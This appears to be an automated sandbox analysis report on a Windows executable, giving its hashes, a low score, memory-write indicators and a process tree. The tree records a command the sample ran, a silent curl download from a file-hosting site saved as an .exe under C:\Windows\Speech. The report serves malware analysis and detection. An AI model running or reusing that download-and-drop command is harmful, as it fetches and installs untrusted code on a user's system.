3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
24-11-2024 06:36

Target

3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe
Size

1.2MB
MD5

e5a4be0eb47c462ad72240167b00d6eb
SHA1

09793e20889984c4d8f18385052baa82202afca8
SHA256

3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15
SHA512

6c2445109f25acb7d8fb545b66db590ba2c4bcc0237829ce99f7bf0c4f135e37b1b5b4afba2477b807bf36c529d679479265fec7657f89faf052cf532a2e2bd1
SSDEEP

12288:F0GtwVUTytoIn41c6iHKnkUxCj2AqeMQmwWe0ZQyRWkhuq3nbep3+bKDZhW/lc4q:ptDZcpHKnkuGKFplpC+bKlAtc06z

Score

1^/10

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe

description	pid	process	target process
PID 464 wrote to memory of 2548	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe
PID 464 wrote to memory of 2548	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe
PID 464 wrote to memory of 2548	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe
PID 464 wrote to memory of 2396	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe
PID 464 wrote to memory of 2396	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe
PID 464 wrote to memory of 2396	464	3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe
"C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2548